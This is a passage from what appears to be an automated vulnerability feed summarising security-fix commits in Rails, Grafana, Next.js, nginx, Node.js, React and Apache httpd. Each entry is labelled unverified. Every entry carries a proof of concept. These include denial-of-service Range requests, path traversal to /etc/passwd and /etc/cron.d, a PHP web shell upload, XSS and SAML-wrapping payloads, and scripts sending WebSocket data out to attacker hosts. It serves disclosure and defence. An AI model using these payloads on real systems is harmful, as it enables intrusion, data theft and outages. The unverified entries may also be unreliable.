    ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0,
                  "start time is out mp4 stco chunks in \"%s\"",
                  mp4->file.name.data);
    return NGX_ERROR;
}

Proof of Concept

Craft an MP4 file where the stco/co64 atom contains exactly N chunk entries, but the computed start_chunk equals N (pointing one past the end). With the old check (start_chunk > chunks), when start_chunk == chunks the check passes and subsequent code reads/writes memory at chunks[N], one element past the allocated buffer. A crafted MP4 with a seek start time that maps to start_chunk == chunks (e.g., start time after all samples) triggers: GET /video.mp4?start=<time_after_last_sample> - causing out-of-bounds memory read/write in the chunk offset update loop.

🔥 HIGH UNVERIFIED Denial of Service (Resource Exhaustion)

Dec 2, 2025, 09:12 AM — rails/rails

Commit: 5b66fcf

Author: Gannon McGibbon

Before the patch, an attacker could send an HTTP Range request with an arbitrarily large byte range (e.g., 'bytes=0-' on a large file) and the server would attempt to download and buffer the entire requested range into memory before sending it. This could exhaust server memory and cause a denial of service. The patch adds a `ranges_valid?` check that rejects any byte ranges whose total size exceeds 100MB (configurable via `ActiveStorage.streaming_chunk_max_size`).

🔍 View Affected Code & PoC

Affected Code

return head(:range_not_satisfiable) if ranges.blank? || ranges.all?(&:blank?)

Proof of Concept

Send an HTTP GET request with a Range header covering the entire file or a very large portion of a large blob:

GET /rails/active_storage/blobs/proxy/:signed_id/:filename HTTP/1.1
Host: target.example.com
Range: bytes=0-

With a multi-gigabyte file stored, this would cause the server to call blob.download_chunk(0..file_size) and load gigabytes into memory. Multiple concurrent such requests would exhaust available RAM and crash the server process. A multi-range attack is also possible:
Range: bytes=0-999999999,1000000000-1999999999

🔥 HIGH UNVERIFIED Denial of Service (DoS) via Multi-Range HTTP Requests

Apr 9, 2025, 11:54 AM — rails/rails

Commit: bb78f8c

Author: Jean Boussier

The ActiveStorage streaming controller allowed multi-range HTTP byte range requests without limiting the number of ranges. An attacker could send a request with thousands of byte ranges, causing the server to download and assemble many chunks from storage in memory, exhausting server resources and potentially causing a DoS. The patch adds a configurable `streaming_max_ranges` limit (defaulting to 1) that rejects requests with more ranges than allowed.

🔍 View Affected Code & PoC

Affected Code

ranges = Rack::Utils.get_byte_ranges(range_header, blob.byte_size)

return head(:range_not_satisfiable) unless ranges_valid?(ranges)

if ranges.length == 1

Proof of Concept

Send a request with thousands of byte ranges to exhaust server memory/connections:

curl -H 'Range: bytes=0-1,2-3,4-5,6-7,8-9,10-11,...(repeat 10000 times)' https://example.com/rails/active_storage/blobs/proxy/SIGNED_ID/file.bin

Each range causes a separate blob.download_chunk() call and all data is accumulated in memory (data << chunk), so 10000 ranges against a large file would download massive amounts of data and hold it all in RAM, potentially crashing the Rails server.

🔥 HIGH UNVERIFIED Denial of Service (ReDoS/Resource Exhaustion)

Jun 11, 2025, 03:48 PM — rails/rails

Commit: 64fabbd

Author: Jean Boussier

BigDecimal in Ruby supports scientific notation (e.g., '9e99999999'), allowing an attacker to pass a short string that causes BigDecimal to allocate an enormous amount of memory when converting the number. Before the patch, any user-controlled string passed to number helper functions (like number_to_currency or number_to_percentage) could trigger this via BigDecimal(number). The patch rejects strings containing 'e' or 'd' (scientific notation indicators) before attempting BigDecimal conversion.

🔍 View Affected Code & PoC

Affected Code

when String
  BigDecimal(number, exception: false)

Proof of Concept

# Sending a tiny string that causes massive memory allocation:
require 'active_support/number_helper'
include ActiveSupport::NumberHelper

# This causes BigDecimal to allocate gigabytes of memory and hang
number_to_currency('9e99999999')  # Before patch: allocates enormous BigDecimal
number_to_currency('1e1000000')   # Similarly, causes DoS via memory exhaustion

# In a Rails app, an attacker can send: POST /payments?amount=9e99999999
# which would cause the server process to hang/crash when formatting the number

⚠️ MEDIUM UNVERIFIED Improper Input Validation / Internal State Manipulation

Jan 7, 2026, 07:53 AM — rails/rails

Commit: 0dbaa44

Author: Jean Boussier

Before the patch, users could set protected metadata keys (analyzed, identified, composed) during a direct upload by including them in the metadata parameter. These keys control internal Active Storage state (e.g., whether a blob has been analyzed or identified), so a malicious user could set 'analyzed: true' or 'identified: true' to bypass file analysis/identification steps that might enforce security policies. The patch filters out these protected keys from user-supplied metadata in create_before_direct_upload!.

🔍 View Affected Code & PoC

Affected Code

def create_before_direct_upload!(key: nil, filename:, byte_size:, checksum:, content_type: nil, metadata: nil, service_name: nil, record: nil)
  create! key: key, filename: filename, byte_size: byte_size, checksum: checksum, content_type: content_type, metadata: metadata, service_name: service_name
end

Proof of Concept

POST /rails/active_storage/direct_uploads
Content-Type: application/json

{"blob":{"filename":"malicious.exe","byte_size":1000,"checksum":"abc123","content_type":"application/octet-stream","metadata":{"analyzed":true,"identified":true}}}

This causes the blob to be marked as already analyzed and identified, bypassing any content analysis or identification checks that could enforce content type policies or detect malicious files.

⚠️ MEDIUM UNVERIFIED XSS (Cross-Site Scripting)

Mar 4, 2026, 09:02 AM — rails/rails

Commit: 6b313e2

Author: Jean Boussier

The `SafeBuffer#%` method failed to preserve the unsafe status of a SafeBuffer when used for string formatting. Before the patch, formatting an unsafe SafeBuffer (one that had been marked unsafe after mutation via gsub!, etc.) would return a new SafeBuffer that was incorrectly marked as html_safe?, allowing unescaped user input to be rendered as raw HTML. The fix propagates the `@html_unsafe` flag to the result of `%` formatting.

🔍 View Affected Code & PoC

Affected Code

def %(args)
  case args
  when Hash
    escaped_args = args.transform_values { |arg| explicit_html_escape_interpolated_argument(arg) }
  else
    escaped_args = Array(args).map { |arg| explicit_html_escape_interpolated_argument(arg) }
  end
  self.class.new(super(escaped_args))
end

Proof of Concept

# Before the patch:
unsafe_buffer = ActiveSupport::SafeBuffer.new
unsafe_buffer.gsub!('', '<%{name}>')  # marks buffer as unsafe
puts unsafe_buffer.html_safe?  # => false (correct)
result = unsafe_buffer % { name: '<script>alert(1)</script>' }
puts result.html_safe?  # => true (BUG! should be false)
# result contains unescaped '<script>alert(1)</script>' and is treated as safe
# When rendered in a Rails view, this would output raw script tags without escaping

🔥 HIGH UNVERIFIED Path Traversal

Mar 13, 2026, 02:39 PM — rails/rails

Commit: 1a5e2f6

Author: Mike Dalessio

ActiveStorage's DiskService allowed path traversal via blob keys containing segments like '../../etc/passwd'. The `path_for` method directly joined the root directory with user-controlled key values without validating that the resolved path stayed within the storage root, allowing attackers to read or write arbitrary files on the server filesystem. The patch adds validation that rejects keys with dot segments and verifies the resolved path remains within the storage root directory.

🔍 View Affected Code & PoC

Affected Code

def path_for(key) # :nodoc:
  File.join root, folder_for(key), key
end

Proof of Concept

# Attacker generates a valid signed URL with a path traversal key (e.g., by intercepting/forging a blob_key token)
# OR if the application allows custom blob keys from user input:

# Step 1: Generate a signed blob key token with traversal payload
encoded_key = ActiveStorage.verifier.generate(
  { key: "../../etc/passwd", disposition: "inline", content_type: "text/plain", service_name: "local" },
  purpose: :blob_key
)

# Step 2: Request the file via DiskController
# GET /rails/active_storage/disk/<encoded_key>/hello.txt
# DiskService#path_for("../../etc/passwd") resolves to /storage_root/xx/yy/../../etc/passwd => /etc/passwd
# Server responds with contents of /etc/passwd

# Similarly for write (direct upload):
encoded_token = ActiveStorage.verifier.generate(
  { key: "../../etc/cron.d/evil", content_type: "text/plain", content_length: 20, checksum: "...", service_name: "local" },
  purpose: :blob_token
)
# PUT /rails/active_storage/disk/<encoded_token> with malicious payload writes to /etc/cron.d/evil

⚠️ MEDIUM UNVERIFIED Glob Injection / Arbitrary File Deletion

Mar 13, 2026, 02:59 PM — rails/rails

Commit: 8fdf7da

Author: Mike Dalessio

Before the patch, `DiskService#delete_prefixed` passed a user-influenced blob key directly into `Dir.glob` without escaping glob metacharacters. If a blob key contained characters like `*`, `?`, `\[`, `\]`, `{`, or `}`, the glob expansion could match and delete unintended files on the filesystem. The patch escapes all glob metacharacters in the resolved path before passing it to `Dir.glob`.

🔍 View Affected Code & PoC

Affected Code

def delete_prefixed(prefix)
  instrument :delete_prefixed, prefix: prefix do
    Dir.glob(path_for("#{prefix}*")).each do |path|
      FileUtils.rm_rf(path)
    end
  end
end

Proof of Concept

# Attacker uploads a blob with a key containing glob metacharacters:
# key = "abc*/sensitive_data"
# When Blob#delete is called, it invokes delete_prefixed with a prefix derived from this key.
# The resulting Dir.glob call becomes:
#   Dir.glob("/storage/root/abc*/sensitive_data*")
# This matches ALL directories starting with 'abc' followed by any characters,
# potentially deleting files belonging to other blobs or even other application data.

# Concrete example:
service = ActiveStorage::Service::DiskService.new(root: "/var/storage")
# If prefix = "ab*" (derived from a crafted blob key)
# Dir.glob("/var/storage/ab**") expands to match ALL files under /var/storage starting with 'ab'
# effectively wiping out all blobs whose storage path starts with 'ab'
service.delete_prefixed("ab*")  # Before patch: deletes all files matching /var/storage/ab**

🔥 HIGH UNVERIFIED Mutation XSS (mXSS)

Mar 16, 2026, 04:06 PM — rails/rails

Commit: 12db701

Author: Mike Dalessio

When a blank string is used as an HTML attribute name in Rails Action View tag helpers, `xml_name_escape` returns an empty string, producing malformed HTML like `&lt;img src="/safe.png" ="/onerror=alert(1)"&gt;`. This malformed HTML can be parsed differently by different HTML parsers, enabling mutation XSS attacks where a browser's HTML parser interprets the malformed attribute as executable code. The patch fixes this by skipping blank attribute keys before they are rendered into HTML.

🔍 View Affected Code & PoC

Affected Code

options.each_pair do |key, value|
  type = TAG_TYPES[key]
  if type == :data && value.is_a?(Hash)
    value.each_pair do |k, v|
      next if v.nil?

Proof of Concept

# In a Rails view, attacker-controlled data reaches tag helper:
tag("img", "src" => "/nonexistent.png", "" => "/onerror=alert(1)")
# Produces before patch: <img src="/nonexistent.png" ="/onerror=alert(1)" />
# The blank attribute name with value containing event handler can be interpreted
# by some HTML parsers as: <img src="/nonexistent.png" /onerror=alert(1)>
# triggering JavaScript execution (mXSS). Reference: HackerOne report #3078929

⚠️ MEDIUM UNVERIFIED XSS (Cross-Site Scripting)

Mar 17, 2026, 05:16 PM — rails/rails

Commit: 4df8089

Author: John Hawthorn

The debug exceptions layout template used `raw` to output the exception message inside a `&lt;script type="text/plain"&gt;` tag without HTML escaping. An attacker who can trigger an exception with a crafted message containing HTML/JavaScript could inject arbitrary script tags that would be rendered in the browser. The patch removes `raw` to use default ERB HTML escaping, ensuring special characters like `&lt;`, `&gt;` are escaped.

🔍 View Affected Code & PoC

Affected Code

<script type="text/plain" id="exception-message-for-copy"><%= raw @exception_message_for_copy %></script>

Proof of Concept

Trigger an exception with message: `x</script><script>alert(1)</script>` (e.g., `raise "x</script><script>alert(1)</script>"`). Before the patch, visiting the error page would execute `alert(1)` in the browser because the raw exception message closes the existing script tag and opens a new executable one. After the patch, the output is HTML-escaped as `&lt;script&gt;alert(1)&lt;/script&gt;`.

🔥 HIGH UNVERIFIED Broken Access Control / Privilege Escalation

Mar 20, 2026, 11:02 PM — grafana/grafana

Commit: aa672a7

Author: Tito Lins

Before this patch, the GET /api/alertmanager/grafana/config/api/v1/alerts endpoint (which returns the raw Alertmanager configuration blob, potentially containing sensitive credentials like SMTP passwords, webhook secrets, and API tokens) was accessible to any user with the broad 'alert.notifications:read' permission, which was granted to Viewers and Editors. Similarly, GET /config/history and POST /config/history/{id}/_activate were accessible to users with alert.notifications:read/write. The patch restricts these endpoints to admin-only via new fine-grained RBAC actions (alert.notifications.config-history:read/write).

🔍 View Affected Code & PoC

Affected Code

case http.MethodGet + "/api/alertmanager/grafana/config/api/v1/alerts":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)
case http.MethodGet + "/api/alertmanager/grafana/config/history":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

As a non-admin Grafana user (Viewer or Editor role) with alert.notifications:read permission, send: GET /api/alertmanager/grafana/config/api/v1/alerts with a valid session cookie. Before the patch, this returns the full raw Alertmanager config including SMTP credentials, webhook URLs with secrets, and API keys. Example: curl -H 'Cookie: grafana_session=<viewer_session>' https://grafana.example.com/api/alertmanager/grafana/config/api/v1/alerts

⚠️ MEDIUM UNVERIFIED Integer Overflow / Division by Zero

Mar 20, 2026, 05:25 PM — nodejs/node

Commit: 7547e79

Author: Node.js GitHub Bot

The patch fixes ICU-23109 in nfrule.cpp where `util64_pow(rule1-&gt;radix, rule1-&gt;exponent)` could overflow to zero, causing a subsequent modulo-by-zero operation (`rule1-&gt;baseValue % util64_pow(rule1-&gt;radix, rule1-&gt;exponent)`). While there was already a comment about preventing `% 0`, the existing check `rule1-&gt;radix != 0` did not guard against the case where the power computation itself overflows to zero. The patch introduces a pre-computed `mod` variable with an explicit overflow check, returning an error status if mod is zero.

🔍 View Affected Code & PoC

Affected Code

if ((rule1->baseValue > 0
    && (rule1->radix != 0) // ICU-23109 Ensure next line won't "% 0"
    && (rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)) == 0)

Proof of Concept

Construct an ICU RuleBasedNumberFormat rule with a large radix and exponent such that util64_pow(radix, exponent) overflows uint64_t to 0, e.g., radix=10, exponent=20+ causes overflow. This triggers division-by-zero in the modulo operation `rule1->baseValue % 0`, which is undefined behavior in C++ and can cause a crash (SIGFPE or abort) when parsing/formatting numbers with such rules in Node.js via the Intl API.
BREAKING

💣 CRITICAL UNVERIFIED XML Signature Wrapping / Authentication Bypass

Mar 20, 2026, 09:36 AM — grafana/grafana

Commit: fa9639f

Author: Matheus Macabu

GHSA-479m-364c-43vc describes a vulnerability in github.com/russellhaering/goxmldsig (used for SAML XML digital signature validation) where an attacker could bypass XML signature verification. The library also depends on github.com/beevik/etree for XML parsing, and the combination of versions before this fix allowed signature wrapping attacks where a malicious SAML response could include a valid signature over one element while the actual authenticated data came from a different, attacker-controlled element. This allowed authentication bypass in Grafana's SAML SSO implementation.

🔍 View Affected Code & PoC

Affected Code

github.com/russellhaering/goxmldsig v1.4.0
github.com/beevik/etree v1.4.1

Proof of Concept

Craft a malicious SAML Response with XML Signature Wrapping:
1. Obtain a valid signed SAML assertion (or intercept one)
2. Wrap it in a crafted XML structure:
<samlp:Response>
  <Signature xmlns="..."><!-- valid signature over benign Assertion --></Signature>
  <saml:Assertion><!-- attacker-controlled assertion with admin privileges -->
    <saml:Subject><saml:NameID>[email protected]</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="role"><saml:AttributeValue>Admin</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
3. The vulnerable goxmldsig v1.4.0 would verify the signature over the benign element but the application would process the attacker's assertion, granting admin access without valid credentials.

⚠️ MEDIUM UNVERIFIED Open Redirect

Mar 19, 2026, 11:44 AM — grafana/grafana

Commit: c62113e

Author: Ezequiel Victorero

The Grafana short URL feature allowed authenticated users to create short URLs with arbitrary target paths, including external URLs like `http://evil.com` or protocol-relative URLs like `//evil.com`. When a victim clicked a Grafana short URL, they would be silently redirected to the attacker-controlled external domain. The patch adds validation at both creation time and redirect time to ensure paths are always relative and cannot contain schemes, protocol-relative prefixes, or other external URL patterns.

🔍 View Affected Code & PoC

Affected Code

// No validation of the path before storing or redirecting
shortURL, err := hs.ShortURLService.CreateShortURL(c.Req.Context(), c.SignedInUser, cmd)
// ...
c.Redirect(setting.ToAbsUrl(shortURL.Path), http.StatusFound)

Proof of Concept

1. Authenticate to Grafana as any signed-in user
2. POST /api/short-urls with body: {"path": "//evil.com/phishing-page"}
3. Receive response with a short URL like: https://grafana.example.com/goto/AbCdEfGh
4. Send this short URL to a victim - when clicked, browser follows redirect to //evil.com/phishing-page (interpreted as https://evil.com/phishing-page)

Alternatively: POST /api/short-urls with body: {"path": "http://evil.com"} to redirect to an explicit external URL.

🔥 HIGH UNVERIFIED Denial of Service / HTTP/2 Protocol Vulnerability

Mar 19, 2026, 10:22 AM — grafana/grafana

Commit: 5a117a2

Author: Hugo Häggmark

This commit patches CVE-2026-33186 in the google.golang.org/grpc library by upgrading from v1.79.1 to v1.79.3. The vulnerability exists in the gRPC-Go HTTP/2 implementation and can be exploited to cause a denial of service condition. The patch updates the dependency across multiple Go modules in the Grafana repository to remediate the vulnerability.

🔍 View Affected Code & PoC

Affected Code

google.golang.org/grpc v1.79.1

Proof of Concept

A malicious client connecting to any gRPC endpoint could send specially crafted HTTP/2 frames to exploit the vulnerability in grpc-go v1.79.1, causing the server to crash or become unresponsive. For example: using a gRPC client to send malformed/crafted HTTP/2 HEADERS or DATA frames to a Grafana gRPC service endpoint, triggering the DoS condition in the affected grpc-go HTTP/2 handler code.

🔥 HIGH UNVERIFIED Improper Access Control / Authentication Bypass

Mar 18, 2026, 08:46 PM — apache/httpd

Commit: e8b5fdc

Author: Rich Bowen

The original example configuration had 'Require all granted' at the Directory level, which grants unauthenticated access to all users by default. The LimitExcept block only required authentication for non-GET/POST/OPTIONS methods, but the outer 'Require all granted' could override authentication requirements depending on configuration context. The patch removes 'Require all granted' and replaces the LimitExcept approach with a RequireAny block that properly requires either the correct HTTP method OR an authenticated admin user, ensuring write operations require authentication.

🔍 View Affected Code & PoC

Affected Code

&lt;Directory "/usr/local/apache2/htdocs/foo"&gt;
    Require all granted
    Dav On
    ...
    &lt;LimitExcept GET POST OPTIONS&gt;
        Require user admin
    &lt;/LimitExcept&gt;

Proof of Concept

With the old config, an unauthenticated user could perform WebDAV write operations: `curl -X PUT http://example.com/foo/malicious.php -d '<?php system($_GET["cmd"]); ?>'` - The 'Require all granted' directive grants access to all users, and depending on Apache's authorization merging behavior, could allow unauthenticated PUT/DELETE/MKCOL requests to modify server files, potentially leading to remote code execution.

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 18, 2026, 11:18 AM — grafana/grafana

Commit: d46801e

Author: Roberto Jiménez Sánchez

Before the patch, a resource manager could be changed directly from one manager to another (e.g., from repo:abc to terraform:xyz) in a single update operation without going through a remove-then-add workflow. This allowed one management system (e.g., Terraform) to silently take over resources managed by another system (e.g., a Git repository), potentially leading to unauthorized control over managed resources and unpredictable reconciliation conflicts. The patch adds an explicit check that blocks any update where both old and new objects have a manager set but with different values, returning HTTP 403.

🔍 View Affected Code & PoC

Affected Code

managerNew, okNew := obj.GetManagerProperties()
managerOld, okOld := old.GetManagerProperties()
if managerNew == managerOld || (okNew && !okOld) { // added manager is OK
    return nil
}

Proof of Concept

// A resource managed by repo:abc can be hijacked by terraform:xyz in one step:
// 1. GET /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// 2. Modify annotations and PUT/UPDATE:
// annotations["grafana.app/manager-kind"] = "terraform"
// annotations["grafana.app/manager-identity"] = "attacker-terraform-workspace"
// PUT /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// Before patch: returns 200 OK, resource is now managed by terraform instead of repo
// After patch: returns 403 Forbidden with message 'Cannot change resource manager; remove the existing manager first, then add the new one'

⚠️ MEDIUM UNVERIFIED Broken Access Control

Mar 17, 2026, 11:28 PM — grafana/grafana

Commit: 1c12cf1

Author: Stephanie Hingtgen

Before this patch, the Grafana Live push endpoint (`/api/live/push/:streamId`) had no RBAC authorization check, allowing any authenticated user (including Viewers) to push metrics and events to Grafana Live streams. The patch adds an `authorize(ac.EvalPermission(ac.ActionLivePush))` middleware that restricts this endpoint to users with the `live:push` permission (granted to Editors and Admins by default).

🔍 View Affected Code & PoC

Affected Code

liveRoute.Post("/push/:streamId", hs.LivePushGateway.Handle)

Proof of Concept

As a Viewer-role user with valid session credentials, send: POST /api/live/push/anystream with body `cpu usage=0.5` and a valid session cookie or API key. Before the patch, this would return HTTP 200 and successfully push data to the stream. After the patch, it returns HTTP 403.

⚠️ MEDIUM UNVERIFIED Cross-Origin Request Forgery / Unauthorized Access to Dev Resources

Mar 17, 2026, 11:02 PM — vercel/next.js

Commit: b2b802c

Author: Zack Tanner

Before this patch, Next.js development servers only warned (but did not block) cross-origin requests to internal dev assets and endpoints (/_next/*, /__nextjs*) when `allowedDevOrigins` was not configured. An attacker could craft a malicious webpage that loads or interacts with internal dev-only resources (HMR WebSocket, error feedback endpoints, internal chunks) from any origin. The patch changes the default behavior from warn-only to blocking with a 403 response, preventing unauthorized cross-origin access to dev server internals.

🔍 View Affected Code & PoC

Affected Code

const mode = typeof allowedDevOrigins === 'undefined' ? 'warn' : 'block'
// ...
return warnOrBlockRequest(res, refererHostname, mode)
// ...
warnOrBlockRequest(res, originLowerCase, mode)

Proof of Concept

# Attacker hosts a page at https://attacker.example.com/exploit.html
# Developer is running Next.js dev server at http://localhost:3000

# The following page silently exfiltrates Next.js internal dev chunks or
# makes requests to internal endpoints without being blocked:

<html>
<body>
<script>
  // Before patch: this request succeeds with 200 (only a warning in CLI)
  fetch('http://localhost:3000/_next/static/chunks/pages/_app.js', {
    mode: 'no-cors',
    headers: { 'Sec-Fetch-Mode': 'no-cors', 'Sec-Fetch-Site': 'cross-site' }
  });

  // Or connect to HMR WebSocket to observe file changes
  const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
  ws.onmessage = (e) => { fetch('https://attacker.example.com/collect?d='+e.data); };
</script>
</body>
</html>

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 06:36 PM — grafana/grafana

Commit: 4eb83a7

Author: MdTanwer

The MSSQL connection string was built by directly concatenating the username and password without escaping special characters. Since semicolons are used as key-value delimiters in the connection string, a password containing a semicolon would be truncated at the semicolon, allowing authentication bypass or connection to unintended databases. For example, a password like `StrongPass;database=other` would cause the driver to parse `database=other` as a separate connection string parameter.

🔍 View Affected Code & PoC

Affected Code

connStr += fmt.Sprintf("user id=%s;password=%s;", dsInfo.User, dsInfo.DecryptedSecureJSONData["password"])

Proof of Concept

Set password to: `wrongpass;user id=sa` — the resulting connection string becomes `server=localhost;database=mydb;user id=user;password=wrongpass;user id=sa;` which causes go-mssqldb to use `sa` as the user id (last value wins in many parsers), potentially authenticating as a different user than intended. Alternatively, password=`x;database=master` redirects the connection to the master database regardless of configured database.

🔥 HIGH UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 17, 2026, 03:06 PM — grafana/grafana

Commit: 3293279

Author: Yuri Tseretyan

The provisioning API's `UpdateContactPoint` endpoint did not perform authorization checks for protected fields (e.g., webhook URLs, API keys) before the patch. Any user with access to the provisioning API could modify protected/sensitive fields in contact points without the required `receivers:update.protected` permission, bypassing the security controls enforced by the regular receiver API. The patch adds a `checkProtectedFields` method that verifies the user has appropriate permissions before allowing modifications to protected fields.

🔍 View Affected Code & PoC

Affected Code

func (ecp *ContactPointService) UpdateContactPoint(ctx context.Context, orgID int64, contactPoint apimodels.EmbeddedContactPoint, provenance models.Provenance) error {

Proof of Concept

A user with provisioning API access but without `receivers:update.protected` permission could send:

PUT /api/v1/provisioning/contact-points/{uid}
Content-Type: application/json
X-Disable-Provenance: true

{"uid":"existing-uid","name":"My Slack","type":"slack","settings":{"url":"https://attacker.com/steal-alerts"},"disableResolveMessage":false}

This would overwrite the protected webhook URL field without the `receivers:update.protected` permission check, allowing an attacker to redirect alert notifications to an attacker-controlled endpoint or exfiltrate alert data.

💡 LOW UNVERIFIED Input Validation Bypass / Size Guard Bypass

Mar 17, 2026, 10:50 AM — facebook/react

Commit: 12ba7d8

Author: Sebastian "Sebbie" Silbermann

The `$B` (Blob) case in `parseModelString` did not validate that the FormData entry was actually a Blob before returning it. Since `FormData.get()` can return either a string or a Blob/File, an attacker could craft a malformed Server Action payload that stores a large string under a key and references it via `$B`, bypassing the `bumpArrayCount` size guard that applies to regular string values. The patch adds an `instanceof Blob` check that throws an error if the backing entry is not a real Blob, closing this bypass. While the PR notes this doesn't produce meaningful amplification on its own, it is a defense-in-depth fix against potential combined attacks.

🔍 View Affected Code & PoC

Affected Code

const backingEntry: Blob = (response._formData.get(blobKey): any);
return backingEntry;

Proof of Concept

const formData = new FormData();
formData.set('1', '-'.repeat(50000)); // large string, not a Blob
formData.set('0', JSON.stringify(['$B1'])); // reference it as a Blob
await ReactServerDOMServer.decodeReply(formData, webpackServerMap);
// Before patch: returns the large string bypassing blob size guards
// After patch: throws 'Referenced Blob is not a Blob.'

🔥 HIGH UNVERIFIED Open Redirect / Server-Side Request Forgery (SSRF)

Mar 17, 2026, 01:41 AM — vercel/next.js

Commit: 00bdb03

Author: Zack Tanner

The commit patches the compiled `http-proxy` / `follow-redirects` library bundled in Next.js, referencing security advisory GHSA-ggv3-7p47-pfv8. The vulnerability involves improper handling of HTTP redirects in the `follow-redirects` library, which could allow an attacker to manipulate redirect targets to leak sensitive request headers (such as Authorization) to unintended hosts or bypass security controls via crafted redirect responses. The patch updates the compiled bundle with fixes to the redirect handling logic.

🔍 View Affected Code & PoC

Affected Code

var r=e.headers.location;if(r&&this._options.followRedirects!==false&&t>=300&&t<400){this._currentRequest.removeAllListeners();this._currentRequest.on("error",noop);this._currentRequest.abort();e.destroy();if(++this._redirectCount>this._options.maxRedirects){this.emit("error",new Error("Max redirects exceeded."));return}

Proof of Concept

An attacker controls a server that returns a 301 redirect response pointing to an attacker-controlled host. When a Next.js application proxies a request with an Authorization header to the attacker's initial URL, the follow-redirects library follows the redirect and forwards the Authorization header to the attacker's second host:

1. Victim Next.js app makes request: GET https://attacker.com/step1 with 'Authorization: Bearer secret-token'
2. attacker.com/step1 responds: HTTP/1.1 301 Moved Permanently\r\nLocation: https://evil.com/collect\r\n
3. The vulnerable follow-redirects code follows the redirect and sends GET https://evil.com/collect with 'Authorization: Bearer secret-token'
4. Attacker's evil.com receives the sensitive token

This is exploitable when Next.js rewrites/proxies user-controlled or partially-controlled URLs with sensitive headers attached.

🔥 HIGH UNVERIFIED Cross-Site Request Forgery (CSRF)

Mar 17, 2026, 01:57 AM — vercel/next.js

Commit: a27a11d

Author: Zack Tanner

Before the patch, when the `Origin` header was set to the string `'null'` (which browsers send from privacy-sensitive contexts like sandboxed iframes), Next.js would skip the CSRF origin check entirely because the code treated `'null'` as a missing/invalid origin and fell through without validation. This allowed an attacker to embed a sandboxed iframe that submits a Server Action cross-origin with user credentials (cookies) attached, bypassing CSRF protection. The patch now treats `'null'` as a valid but opaque origin and checks it against the `allowedOrigins` allowlist, blocking unauthorized cross-origin Server Action submissions from sandboxed contexts.

🔍 View Affected Code & PoC

Affected Code

const originDomain =
    typeof originHeader === 'string' && originHeader !== 'null'
      ? new URL(originHeader).host
      : undefined

Proof of Concept

Attacker hosts malicious page at https://evil.com with:
<iframe sandbox="allow-forms" src="https://evil.com/attack.html"></iframe>

attack.html contains:
<form method="POST" action="https://victim.com/sensitive-page">
  <input name="$ACTION_ID_abc123" value="" />
  <input type="submit" />
</form>
<script>document.forms[0].submit()</script>

Browser sends: Origin: null (opaque origin from sandboxed iframe)
Before patch: originDomain = undefined, CSRF check is skipped with only a warning, action executes with victim's cookies.
After patch: originHost = 'null', checked against allowedOrigins; since 'null' is not in allowedOrigins, request is rejected with 403/500.

🔥 HIGH UNVERIFIED Cross-Site WebSocket Hijacking / CSRF

Mar 17, 2026, 12:42 AM — vercel/next.js

Commit: 862f9b9

Author: Zack Tanner

Before the patch, WebSocket connections to Next.js dev server endpoints (e.g., /_next/webpack-hmr) were accepted from privacy-sensitive origins (e.g., pages served with 'sandbox' CSP that sets origin to null). The old code only blocked requests when rawOrigin was truthy AND not equal to 'null', meaning requests with origin header 'null' (sent by sandboxed iframes/pages) bypassed origin validation entirely. The patch fixes this by treating a 'null' origin as a defined but non-allowed origin, causing such requests to be blocked.

🔍 View Affected Code & PoC

Affected Code

if (rawOrigin && rawOrigin !== 'null') {
    const parsedOrigin = parseUrl(rawOrigin)
    if (parsedOrigin) {
      const originLowerCase = parsedOrigin.hostname.toLowerCase()
      if (!isCsrfOriginAllowed(originLowerCase, allowedOrigins)) {
        return warnOrBlockRequest(res, originLowerCase, mode)
      }
    }
  }
  return false

Proof of Concept

1. Attacker hosts a page at http://attacker.com/ with Content-Security-Policy: sandbox allow-scripts (causing browser to send Origin: null for requests)
2. Page contains: <script>const ws = new WebSocket('http://localhost:3000/_next/webpack-hmr'); ws.onmessage = (e) => { fetch('https://attacker.com/collect?d='+encodeURIComponent(e.data)) }</script>
3. Victim (developer) visits http://attacker.com/ while running Next.js dev server
4. Browser sends WebSocket upgrade with Origin: null header
5. Old code skips validation (rawOrigin === 'null' condition exits early), connection is accepted
6. Attacker can receive HMR messages, potentially revealing source code structure or injecting malicious HMR updates

🔥 HIGH UNVERIFIED Missing Authorization / Broken Access Control

Mar 16, 2026, 11:31 PM — grafana/grafana

Commit: 5c89af6

Author: Ezequiel Victorero

Before this patch, the Kubernetes API endpoints for dashboard snapshots (GET, LIST, DELETE, POST /create, DELETE /delete/{deleteKey}, GET /settings) used a default `ServiceAuthorizer` that did not enforce RBAC permissions for snapshot resources. Any authenticated user, regardless of their assigned permissions, could read, list, create, and delete snapshots. The patch adds a `SnapshotAuthorizer` that maps K8s verbs to Grafana RBAC actions (`snapshots:read`, `snapshots:create`, `snapshots:delete`) and applies RBAC checks to the custom HTTP routes as well.

🔍 View Affected Code & PoC

Affected Code

func (b *DashboardsAPIBuilder) GetAuthorizer() authorizer.Authorizer {
	return grafanaauthorizer.NewServiceAuthorizer()
}

Proof of Concept

A user with no snapshot permissions (e.g., Org role 'None') can access snapshot data:

GET /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots
  -> Returns 200 OK with snapshot list (should be 403 Forbidden)

DELETE /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/{snapshotKey}
  -> Returns 200 OK (should be 403 Forbidden)

POST /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/create
  Body: {"dashboard":{"uid":"existing-uid","title":"test"},"name":"stolen"}
  -> Returns 200 OK creating a snapshot (should be 403 Forbidden)

🔥 HIGH UNVERIFIED Broken Access Control / Insecure Direct Object Reference

Mar 16, 2026, 07:55 PM — grafana/grafana

Commit: f62299e

Author: Michael Mandrus

